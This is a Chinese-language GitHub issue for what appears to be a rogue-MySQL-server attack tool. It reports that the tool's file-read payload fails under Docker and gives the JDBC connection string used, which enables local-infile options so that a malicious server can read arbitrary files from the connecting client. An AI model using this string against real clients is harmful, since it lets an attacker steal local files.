Skip to content

v1.4.4 docker部署模式下FakeMysqlReadPayload无法读取文件 #54

@Catherines77

Description

@Catherines77

v1.4.4用docker部署,可以看到读取失败

Image

v1.4.4不用docker部署,同样的payload读取成功

Image

没排查出来是什么原因,同一网络,同一生成方式,代码和依赖也没改

String DB_URL = "jdbc:mysql://x.x.x.x:3308/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360&user=f8b5758";
Connection conn = DriverManager.getConnection(DB_URL);

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions